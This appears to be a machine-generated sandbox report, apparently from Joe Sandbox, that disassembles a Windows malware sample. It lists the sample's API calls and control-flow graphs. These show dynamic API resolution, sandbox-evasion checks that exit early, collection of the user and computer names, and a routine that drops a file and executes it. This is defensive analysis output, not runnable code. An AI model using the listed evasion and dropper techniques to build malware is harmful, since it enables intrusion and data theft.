lstrcpy 19070->19071 19072 40c0de 19071->19072 19701 4106d0 GetProcessHeap RtlAllocateHeap 19072->19701 19075 413260 4 API calls 19076 40c0fe 19075->19076 19077 413150 lstrcpy 19076->19077 19078 40c107 19077->19078 19079 413260 4 API calls 19078->19079 19080 40c126 19079->19080 19081 413150 lstrcpy 19080->19081 19082 40c12f 19081->19082 19083 413260 4 API calls 19082->19083 19084 40c150 19083->19084 19085 413150 
lstrcpy 19084->19085 19086 40c159 19085->19086 19703 410750 GetCurrentProcess 19086->19703 19089 413260 4 API calls 19090 40c179 19089->19090 19091 413150 lstrcpy 19090->19091 19092 40c182 19091->19092 19093 413260 4 API calls 19092->19093 19094 40c1a1 19093->19094 19095 413150 lstrcpy 19094->19095 19096 40c1aa 19095->19096 19097 413260 4 API calls 19096->19097 19098 40c1cb 19097->19098 19099 413150 lstrcpy 19098->19099 19100 40c1d4 19099->19100 19705 410790 GetProcessHeap RtlAllocateHeap GetUserNameA 19100->19705 19102 40c1e4 19103 413260 4 API calls 19102->19103 19104 40c1f4 19103->19104 19105 413150 lstrcpy 19104->19105 19106 40c1fd 19105->19106 19107 413260 4 API calls 19106->19107 19108 40c21c 19107->19108 19109 413150 lstrcpy 19108->19109 19110 40c225 19109->19110 19111 413260 4 API calls 19110->19111 19112 40c245 19111->19112 19113 413150 lstrcpy 19112->19113 19114 40c24e 19113->19114 19115 4107d0 3 API calls 19114->19115 19116 40c25e 19115->19116 19117 413260 4 API calls 19116->19117 19118 40c26e 19117->19118 19119 413150 lstrcpy 19118->19119 19120 40c277 19119->19120 19121 413260 4 API calls 19120->19121 19122 40c296 19121->19122 19123 413150 lstrcpy 19122->19123 19124 40c29f 19123->19124 19125 413260 4 API calls 19124->19125 19126 40c2c0 19125->19126 19127 413150 lstrcpy 19126->19127 19128 40c2c9 19127->19128 19706 410820 GetProcessHeap RtlAllocateHeap 19128->19706 19131 413260 4 API calls 19132 40c2e9 19131->19132 19133 413150 lstrcpy 19132->19133 19134 40c2f2 19133->19134 19135 413260 4 API calls 19134->19135 19136 40c311 19135->19136 19137 413150 lstrcpy 19136->19137 19138 40c31a 19137->19138 19139 413260 4 API calls 19138->19139 19140 40c33b 19139->19140 19141 413150 lstrcpy 19140->19141 19142 40c344 19141->19142 19708 410880 GetProcessHeap RtlAllocateHeap 19142->19708 19145 413260 4 API calls 19146 40c364 19145->19146 19147 413150 lstrcpy 19146->19147 19148 40c36d 19147->19148 19149 413260 4 API calls 19148->19149 19150 40c38c 19149->19150 19151 
413150 lstrcpy 19150->19151 19152 40c395 19151->19152 19153 413260 4 API calls 19152->19153 19154 40c3b5 19153->19154 19155 413150 lstrcpy 19154->19155 19156 40c3be 19155->19156 19157 413260 4 API calls 19156->19157 19158 40c3de 19157->19158 19159 413150 lstrcpy 19158->19159 19160 40c3e7 19159->19160 19161 413260 4 API calls 19160->19161 19162 40c406 19161->19162 19163 413150 lstrcpy 19162->19163 19164 40c40f 19163->19164 19165 413260 4 API calls 19164->19165 19166 40c430 19165->19166 19167 413150 lstrcpy 19166->19167 19168 40c439 19167->19168 19710 410940 19168->19710 19170 40c450 19171 4131d0 3 API calls 19170->19171 19172 40c463 19171->19172 19173 413150 lstrcpy 19172->19173 19174 40c46c 19173->19174 19175 413260 4 API calls 19174->19175 19176 40c496 19175->19176 19177 413150 lstrcpy 19176->19177 19178 40c49f 19177->19178 19179 413260 4 API calls 19178->19179 19180 40c4bf 19179->19180 19181 413150 lstrcpy 19180->19181 19182 40c4c8 19181->19182 19183 413260 4 API calls 19182->19183 19184 40c4e8 19183->19184 19185 413150 lstrcpy 19184->19185 19186 40c4f1 19185->19186 19187 413260 4 API calls 19186->19187 19188 40c510 19187->19188 19189 413150 lstrcpy 19188->19189 19190 40c519 19189->19190 19191 413260 4 API calls 19190->19191 19192 40c53a 19191->19192 19193 413150 lstrcpy 19192->19193 19194 40c543 19193->19194 19718 411ee0 19194->19718 19197 4131d0 3 API calls 19198 40c574 19197->19198 19199 413150 lstrcpy 19198->19199 19200 40c57d 19199->19200 19201 413260 4 API calls 19200->19201 19202 40c5a7 19201->19202 19203 413150 lstrcpy 19202->19203 19204 40c5b0 19203->19204 19205 413260 4 API calls 19204->19205 19206 40c5d0 19205->19206 19207 413150 lstrcpy 19206->19207 19208 40c5d9 19207->19208 19724 410b10 GetProcessHeap RtlAllocateHeap 19208->19724 19211 413260 4 API calls 19212 40c5f9 19211->19212 19213 413150 lstrcpy 19212->19213 19214 40c602 19213->19214 19215 413260 4 API calls 19214->19215 19216 40c621 19215->19216 19217 413150 lstrcpy 19216->19217 19218 40c62a 
19217->19218 19219 413260 4 API calls 19218->19219 19220 40c64b 19219->19220 19221 413150 lstrcpy 19220->19221 19222 40c654 19221->19222 19726 410bd0 19222->19726 19225 413260 4 API calls 19226 40c674 19225->19226 19227 413150 lstrcpy 19226->19227 19228 40c67d 19227->19228 19229 413260 4 API calls 19228->19229 19230 40c69c 19229->19230 19231 413150 lstrcpy 19230->19231 19232 40c6a5 19231->19232 19233 413260 4 API calls 19232->19233 19234 40c6c6 19233->19234 19235 413150 lstrcpy 19234->19235 19236 40c6cf 19235->19236 19735 410b90 GetSystemInfo 19236->19735 19239 413260 4 API calls 19240 40c6ef 19239->19240 19241 413150 lstrcpy 19240->19241 19242 40c6f8 19241->19242 19243 413260 4 API calls 19242->19243 19244 40c717 19243->19244 19245 413150 lstrcpy 19244->19245 19246 40c720 19245->19246 19247 413260 4 API calls 19246->19247 19248 40c740 19247->19248 19249 413150 lstrcpy 19248->19249 19250 40c749 19249->19250 19737 410d30 GetProcessHeap RtlAllocateHeap 19250->19737 19252 40c759 19253 413260 4 API calls 19252->19253 19254 40c769 19253->19254 19255 413150 lstrcpy 19254->19255 19256 40c772 19255->19256 19257 413260 4 API calls 19256->19257 19258 40c791 19257->19258 19259 413150 lstrcpy 19258->19259 19260 40c79a 19259->19260 19261 413260 4 API calls 19260->19261 19262 40c7bb 19261->19262 19263 413150 lstrcpy 19262->19263 19264 40c7c4 19263->19264 19741 4112a0 19264->19741 19267 4131d0 3 API calls 19268 40c7ee 19267->19268 19269 413150 lstrcpy 19268->19269 19270 40c7f7 19269->19270 19271 413260 4 API calls 19270->19271 19272 40c821 19271->19272 19273 413150 lstrcpy 19272->19273 19274 40c82a 19273->19274 19275 413260 4 API calls 19274->19275 19276 40c84a 19275->19276 19277 413150 lstrcpy 19276->19277 19278 40c853 19277->19278 19279 413260 4 API calls 19278->19279 19280 40c872 19279->19280 19281 413150 lstrcpy 19280->19281 19282 40c87b 19281->19282 19747 410dd0 19282->19747 19284 40c892 19285 4131d0 3 API calls 19284->19285 19286 40c8a5 19285->19286 19287 413150 lstrcpy 

                                          Control-flow Graph

                                          APIs
                                          • GetProcAddress.KERNEL32(75550000,00880DD0), ref: 004121C1
                                          • GetProcAddress.KERNEL32(75550000,00880E08), ref: 004121DA
                                          • GetProcAddress.KERNEL32(75550000,00880E38), ref: 004121F2
                                          • GetProcAddress.KERNEL32(75550000,00880E70), ref: 0041220A
                                          • GetProcAddress.KERNEL32(75550000,00880EA8), ref: 00412223
                                          • GetProcAddress.KERNEL32(75550000,00880EE0), ref: 0041223B
                                          • GetProcAddress.KERNEL32(75550000,00880F08), ref: 00412253
                                          • GetProcAddress.KERNEL32(75550000,00880F50), ref: 0041226C
                                          • GetProcAddress.KERNEL32(75550000,00880F90), ref: 00412284
                                          • GetProcAddress.KERNEL32(75550000,00880FC8), ref: 0041229C
                                          • GetProcAddress.KERNEL32(75550000,00881000), ref: 004122B5
                                          • GetProcAddress.KERNEL32(75550000,00881038), ref: 004122CD
                                          • GetProcAddress.KERNEL32(75550000,008804B0), ref: 004122E5
                                          • GetProcAddress.KERNEL32(75550000,008804F0), ref: 004122FE
                                          • GetProcAddress.KERNEL32(75550000,00881270), ref: 00412316
                                          • GetProcAddress.KERNEL32(75550000,00881298), ref: 0041232E
                                          • GetProcAddress.KERNEL32(75550000,008812C8), ref: 00412347
                                          • GetProcAddress.KERNEL32(75550000,00880510), ref: 0041235F
                                          • GetProcAddress.KERNEL32(75550000,00880538), ref: 00412377
                                          • GetProcAddress.KERNEL32(75550000,00880570), ref: 00412390
                                          • GetProcAddress.KERNEL32(75550000,008857F0), ref: 004123A8
                                          • LoadLibraryA.KERNEL32(00885828,?,00410440), ref: 004123BA
                                          • LoadLibraryA.KERNEL32(00880598,?,00410440), ref: 004123CB
                                          • LoadLibraryA.KERNEL32(00885850,?,00410440), ref: 004123DD
                                          • LoadLibraryA.KERNELBASE(00885878,?,00410440), ref: 004123EF
                                          • LoadLibraryA.KERNEL32(008858A0,?,00410440), ref: 00412400
                                          • GetProcAddress.KERNEL32(75670000,008858C0), ref: 00412422
                                          • GetProcAddress.KERNEL32(75750000,008858E8), ref: 00412443
                                          • GetProcAddress.KERNEL32(75750000,00885908), ref: 0041245B
                                          • GetProcAddress.KERNEL32(76BE0000,00885930), ref: 0041247D
                                          • GetProcAddress.KERNEL32(759D0000,00885950), ref: 0041249E
                                          • GetProcAddress.KERNEL32(773F0000,00885988), ref: 004124BF
                                          • GetProcAddress.KERNEL32(773F0000,NtQueryInformationProcess), ref: 004124D6
                                          Strings
                                          • NtQueryInformationProcess, xrefs: 004124CA
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1511164621.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1511164621.0000000000618000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1511164621.000000000062A000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_7Y18r(193).jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AddressProc$LibraryLoad
                                          • String ID: NtQueryInformationProcess
                                          • API String ID: 2238633743-2781105232
                                          • Opcode ID: a6446af475f856057040de3f9c45a65888bee7be2fd0af68c1fc8b12d5e42eef
                                          • Instruction ID: 2b855f960e21fd0b6a67d09d83690fbde116cffe07640de17fe385095ce8f71f
                                          • Opcode Fuzzy Hash: a6446af475f856057040de3f9c45a65888bee7be2fd0af68c1fc8b12d5e42eef
                                          • Instruction Fuzzy Hash: 21A12BB55102409FC384DFA9EC88ADA77EBE78D701768E61BEA09C36A0DE359841CF54

                                          Control-flow Graph

                                          APIs
                                          • CreateFileA.KERNELBASE(?,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 007BA223
                                          • WriteFile.KERNELBASE(00000000,FFC4DFFC,00003E00,?,00000000), ref: 007BA252
                                          • FindCloseChangeNotification.KERNELBASE(00000000), ref: 007BA256
                                          • WinExec.KERNEL32(?,00000005), ref: 007BA262
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1511336437.00000000007BA000.00000040.00000001.01000000.00000003.sdmp, Offset: 007BA000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ba000_7Y18r(193).jbxd
                                          Similarity
                                          • API ID: File$ChangeCloseCreateExecFindNotificationWrite
                                          • String ID: .dll$Clos$Crea$GetM$GetT$Kern$WinE$Writ$WuiXLS.exe$athA$catA$dleA$el32$lstr$odul
                                          • API String ID: 2234911746-2764548048
                                          • Opcode ID: 86c1030d4f9e2b8ea241b1d992b15d5e3375bb5488e3fb8d4b65644e615d70b5
                                          • Instruction ID: a59056b2508f6d270b4221048e903345f4b06a29b703aa9d08c8a21bc38b8235
                                          • Opcode Fuzzy Hash: 86c1030d4f9e2b8ea241b1d992b15d5e3375bb5488e3fb8d4b65644e615d70b5
                                          • Instruction Fuzzy Hash: 85612874D0121DEBCF64DF98C984BEDB7B4BF54315F2482AAE405AB241C3789E81CB92

                                          Control-flow Graph

                                          APIs
                                          • GetSystemTime.KERNEL32(4HA,?,?,00410562,00000000,?,008859C8,?,00414834,?,00000000,?), ref: 004103AC
                                          • sscanf.NTDLL ref: 004103D9
                                          • SystemTimeToFileTime.KERNEL32(4HA,00000000,?,?,?,?,?,?,?,?,?,?,?,008859C8,?,00414834), ref: 004103F2
                                          • SystemTimeToFileTime.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,008859C8,?,00414834), ref: 00410400
                                          • ExitProcess.KERNEL32 ref: 0041041A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1511164621.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1511164621.0000000000618000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1511164621.000000000062A000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_7Y18r(193).jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Time$System$File$ExitProcesssscanf
                                          • String ID: 4HA
                                          • API String ID: 2533653975-3847757909
                                          • Opcode ID: dece3023bcda19b2d979622ffeb509d4e92cd5aaab2d93c02f90c0a348cde40b
                                          • Instruction ID: 38bcd1f9b3be50fdaf38e9a9edd1f3871f0095c834be273fdbbfa22a262d8c3d
                                          • Opcode Fuzzy Hash: dece3023bcda19b2d979622ffeb509d4e92cd5aaab2d93c02f90c0a348cde40b
                                          • Instruction Fuzzy Hash: 7A21EAB5D14208AFCB04EFE4E845AEEB7B6FF48300F04856EE506A3250EB345648CB68

                                          Control-flow Graph

                                          APIs
                                          • GetProcessHeap.KERNEL32(00000000,00000104,0041047C,00414682), ref: 004107DD
                                          • RtlAllocateHeap.NTDLL(00000000), ref: 004107E4
                                          • GetComputerNameA.KERNEL32(?,00000104), ref: 004107FC
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1511164621.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1511164621.0000000000618000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1511164621.000000000062A000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_7Y18r(193).jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Heap$AllocateComputerNameProcess
                                          • String ID:
                                          • API String ID: 1664310425-0
                                          • Opcode ID: 480c2fa70fa46ef749b0ad9a2cea2b489044561edb8350ecda8cf0f58b79bf2e
                                          • Instruction ID: 6ad3a43f835fa594ef2b668d6339a37c016d9136f00cfcf8885baffc72510f62
                                          • Opcode Fuzzy Hash: 480c2fa70fa46ef749b0ad9a2cea2b489044561edb8350ecda8cf0f58b79bf2e
                                          • Instruction Fuzzy Hash: 42E048B4904208FFD700EFE4DD49BDD7BBDEB04301F148056EA05D3280DBB49A849755

                                          Control-flow Graph

                                          APIs
                                          • GetProcessHeap.KERNEL32(00000000,00000104,00401157,008859E0,0041047C,00414682), ref: 0041079D
                                          • RtlAllocateHeap.NTDLL(00000000), ref: 004107A4
                                          • GetUserNameA.ADVAPI32(?,00000104), ref: 004107BC
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1511164621.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1511164621.0000000000618000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1511164621.000000000062A000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_7Y18r(193).jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Heap$AllocateNameProcessUser
                                          • String ID:
                                          • API String ID: 1296208442-0
                                          • Opcode ID: 937e87e3d1343579e2890d02c50287dfd1430cf33c95467ffc1631912f7c9db2
                                          • Instruction ID: 62a3c386001e156eb1dd6fb720cf38bb7be8a63b6e0cfa00a5a814fc280f9594
                                          • Opcode Fuzzy Hash: 937e87e3d1343579e2890d02c50287dfd1430cf33c95467ffc1631912f7c9db2
                                          • Instruction Fuzzy Hash: ABE0E6B594020CBFC740DFE4DD49ACDBBBDEB08301F144196EA45D3290DA7056448B51

                                          Control-flow Graph

                                          APIs
                                          • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 008E5D9F
                                          • Module32First.KERNEL32(00000000,00000224), ref: 008E5DBF
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1511687586.00000000008E2000.00000040.00000020.00020000.00000000.sdmp, Offset: 008E2000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_8e2000_7Y18r(193).jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CreateFirstModule32SnapshotToolhelp32
                                          • String ID:
                                          • API String ID: 3833638111-0
                                          • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                          • Instruction ID: 9be8a861009f542c36315d6f26fa6441b232b5db39552310cf8255f85d0c3a15
                                          • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                          • Instruction Fuzzy Hash: E3F09631200B556BD7203BFA9C8DBAE76E8FF4A728F100538F646D20C0DBB0EC454A61

                                          Control-flow Graph

                                          APIs
                                            • Part of subcall function 00412180: GetProcAddress.KERNEL32(75550000,00880DD0), ref: 004121C1
                                            • Part of subcall function 00412180: GetProcAddress.KERNEL32(75550000,00880E08), ref: 004121DA
                                            • Part of subcall function 00412180: GetProcAddress.KERNEL32(75550000,00880E38), ref: 004121F2
                                            • Part of subcall function 00412180: GetProcAddress.KERNEL32(75550000,00880E70), ref: 0041220A
                                            • Part of subcall function 00412180: GetProcAddress.KERNEL32(75550000,00880EA8), ref: 00412223
                                            • Part of subcall function 00412180: GetProcAddress.KERNEL32(75550000,00880EE0), ref: 0041223B
                                            • Part of subcall function 00412180: GetProcAddress.KERNEL32(75550000,00880F08), ref: 00412253
                                            • Part of subcall function 00412180: GetProcAddress.KERNEL32(75550000,00880F50), ref: 0041226C
                                            • Part of subcall function 00412180: GetProcAddress.KERNEL32(75550000,00880F90), ref: 00412284
                                            • Part of subcall function 00412180: GetProcAddress.KERNEL32(75550000,00880FC8), ref: 0041229C
                                            • Part of subcall function 00412180: GetProcAddress.KERNEL32(75550000,00881000), ref: 004122B5
                                            • Part of subcall function 00412180: GetProcAddress.KERNEL32(75550000,00881038), ref: 004122CD
                                            • Part of subcall function 00412180: GetProcAddress.KERNEL32(75550000,008804B0), ref: 004122E5
                                            • Part of subcall function 00412180: GetProcAddress.KERNEL32(75550000,008804F0), ref: 004122FE
                                            • Part of subcall function 00412FF0: lstrcpy.KERNEL32(00414682,00000000), ref: 00413038
                                          • ExitProcess.KERNEL32 ref: 00410458
                                          • GetUserDefaultLangID.KERNELBASE ref: 00410477
                                          • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,008859C8,?,00414834,?,00000000,?,00414838,?,00000000,00414682), ref: 0041051B
                                          • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00410539
                                          • CloseHandle.KERNEL32(?,00000000,?,008859C8,?,00414834,?,00000000,?,00414838,?,00000000,00414682), ref: 0041056B
                                          • ExitProcess.KERNEL32 ref: 00410573
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1511164621.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1511164621.0000000000618000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1511164621.000000000062A000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_7Y18r(193).jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AddressProc$EventExitProcess$CloseCreateDefaultHandleLangOpenUserlstrcpy
                                          • String ID:
                                          • API String ID: 1959285754-0
                                          • Opcode ID: 6517d3138269d14e120e1c3bed66e1ae4be7545d0679ea862cc0bb667e130bbb
                                          • Instruction ID: d4afb3438832cf5cad8627414314604812863dbfbc7a654f21b67f6263b1a6d7
                                          • Opcode Fuzzy Hash: 6517d3138269d14e120e1c3bed66e1ae4be7545d0679ea862cc0bb667e130bbb
                                          • Instruction Fuzzy Hash: 1B318070900208AACB04FBF1DC56BEE7379AF08305F14412FF112A61D1DF7C5A848A6E

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 213 89003c-890047 214 890049 213->214 215 89004c-890263 call 890a3f call 890e0f call 890d90 VirtualAlloc 213->215 214->215 230 89028b-890292 215->230 231 890265-890289 call 890a69 215->231 233 8902a1-8902b0 230->233 235 8902ce-8903c2 VirtualProtect call 890cce call 890ce7 231->235 233->235 236 8902b2-8902cc 233->236 242 8903d1-8903e0 235->242 236->233 243 890439-8904b8 VirtualFree 242->243 244 8903e2-890437 call 890ce7 242->244 246 8904be-8904cd 243->246 247 8905f4-8905fe 243->247 244->242 249 8904d3-8904dd 246->249 250 89077f-890789 247->250 251 890604-89060d 247->251 249->247 253 8904e3-890505 249->253 254 89078b-8907a3 250->254 255 8907a6-8907b0 250->255 251->250 256 890613-890637 251->256 264 890517-890520 253->264 265 890507-890515 253->265 254->255 257 89086e-8908be LoadLibraryA 255->257 258 8907b6-8907cb 255->258 259 89063e-890648 256->259 263 8908c7-8908f9 257->263 261 8907d2-8907d5 258->261 259->250 262 89064e-89065a 259->262 266 890824-890833 261->266 267 8907d7-8907e0 261->267 262->250 268 890660-89066a 262->268 269 8908fb-890901 263->269 270 890902-89091d 263->270 271 890526-890547 264->271 265->271 275 890839-89083c 266->275 272 8907e2 267->272 273 8907e4-890822 267->273 274 89067a-890689 268->274 269->270 276 89054d-890550 271->276 272->266 273->261 277 89068f-8906b2 274->277 278 890750-89077a 274->278 275->257 279 89083e-890847 275->279 285 8905e0-8905ef 276->285 286 890556-89056b 276->286 280 8906ef-8906fc 277->280 281 8906b4-8906ed 277->281 278->259 282 890849 279->282 283 89084b-89086c 279->283 287 89074b 280->287 288 8906fe-890748 280->288 281->280 282->257 283->275 285->249 289 89056d 286->289 290 89056f-89057a 286->290 287->274 288->287 289->285 293 89059b-8905bb 290->293 294 89057c-890599 290->294 297 8905bd-8905db 293->297 294->297 297->276
                                          APIs
                                          • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0089024D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1511542856.0000000000890000.00000040.00001000.00020000.00000000.sdmp, Offset: 00890000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_890000_7Y18r(193).jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AllocVirtual
                                          • String ID: cess$kernel32.dll
                                          • API String ID: 4275171209-1230238691
                                          • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                          • Instruction ID: 1f131b03efb52d8d2cb776e081289fe3a7e0bf253f2524d73c33877c8b79cae2
                                          • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                          • Instruction Fuzzy Hash: 5C526974A01229DFDB64CF98C984BA8BBB1BF09314F1480D9E54DAB351DB30AE85DF15

                                          Control-flow Graph

                                          APIs
                                          • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,008859C8,?,00414834,?,00000000,?,00414838,?,00000000,00414682), ref: 0041051B
                                          • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00410539
                                          • CloseHandle.KERNEL32(00000000), ref: 0041054A
                                          • Sleep.KERNEL32(00001770), ref: 00410555
                                          • CloseHandle.KERNEL32(?,00000000,?,008859C8,?,00414834,?,00000000,?,00414838,?,00000000,00414682), ref: 0041056B
                                          • ExitProcess.KERNEL32 ref: 00410573
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1511164621.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1511164621.0000000000618000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1511164621.000000000062A000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_7Y18r(193).jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                                          • String ID:
                                          • API String ID: 941982115-0
                                          • Opcode ID: e403f8ffbb91593beead32c91cec5554c3c6bf1e1477261f753fe489317f82a5
                                          • Instruction ID: 09006b0c0d094d90b807d966d12cc723470bc1340685d3f592327e246f0b06a7
                                          • Opcode Fuzzy Hash: e403f8ffbb91593beead32c91cec5554c3c6bf1e1477261f753fe489317f82a5
                                          • Instruction Fuzzy Hash: E0F05E70940219BFE710EBA0DC4ABFE7276AB04701F24561BB512A21D1DFF856C1CE6A

                                          Control-flow Graph

                                          APIs
                                          • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,?,?,0041046D), ref: 004010CB
                                          • VirtualAllocExNuma.KERNELBASE(00000000,?,?,0041046D), ref: 004010D2
                                          • ExitProcess.KERNEL32 ref: 004010E3
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1511164621.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1511164621.0000000000618000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1511164621.000000000062A000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_7Y18r(193).jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Process$AllocCurrentExitNumaVirtual
                                          • String ID:
                                          • API String ID: 1103761159-0
                                          • Opcode ID: 02f01bea4ca8033e23f9450e388b7e8141895c992345e94fa4242c0d06c86fb7
                                          • Instruction ID: a6aaf47c391cb192c0c5c3f1db6919c13433da3f39274503cfdd87793102492c
                                          • Opcode Fuzzy Hash: 02f01bea4ca8033e23f9450e388b7e8141895c992345e94fa4242c0d06c86fb7
                                          • Instruction Fuzzy Hash: 5EE0CD70985308FFE7105BD1DC4EB4D76B8DB00B15F205056F708B75D0CAB82940469C

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 347 890e0f-890e24 SetErrorMode * 2 348 890e2b-890e2c 347->348 349 890e26 347->349 349->348
                                          APIs
                                          • SetErrorMode.KERNELBASE(00000400,?,?,00890223,?,?), ref: 00890E19
                                          • SetErrorMode.KERNELBASE(00000000,?,?,00890223,?,?), ref: 00890E1E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1511542856.0000000000890000.00000040.00001000.00020000.00000000.sdmp, Offset: 00890000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_890000_7Y18r(193).jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorMode
                                          • String ID:
                                          • API String ID: 2340568224-0
                                          • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                          • Instruction ID: e153f05878e9c0a74f13e5799d4f8d311248a5422619a5405020419e5db8524d
                                          • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                          • Instruction Fuzzy Hash: 26D0123514512877DB003A94DC09BCD7B1CDF05B62F048411FB0DD9080C770994046E5

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 350 401040-401060 VirtualAlloc 351 401062-401065 350->351 352 401067-40106f 350->352 351->352 353 401071-401097 call 4113e0 VirtualFree 352->353 354 40109d-4010a1 352->354 353->354
                                          APIs
                                          • VirtualAlloc.KERNELBASE(00000000,17C841C0,00003000,00000004,?,?,?,004010EE,?,?,0041046D), ref: 00401053
                                          • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0,?,?,?,004010EE,?,?,0041046D), ref: 00401097
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1511164621.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1511164621.0000000000618000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1511164621.000000000062A000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_7Y18r(193).jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Virtual$AllocFree
                                          • String ID:
                                          • API String ID: 2087232378-0
                                          • Opcode ID: 2127c79f024b7626c24b81512452acd09f02aa6690b884efd6c8790533b1e997
                                          • Instruction ID: 012b993cb448760cb48d5cdc1528a6a66ba78387253dacbad9f7badd6063d305
                                          • Opcode Fuzzy Hash: 2127c79f024b7626c24b81512452acd09f02aa6690b884efd6c8790533b1e997
                                          • Instruction Fuzzy Hash: AAF0E271681308BBE7149BB4AC59FAFB398A705B45F304859FA44E3290D5719E0086A4

                                          Control-flow Graph

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1511164621.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1511164621.0000000000618000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1511164621.000000000062A000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_7Y18r(193).jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: malloc
                                          • String ID:
                                          • API String ID: 2803490479-0
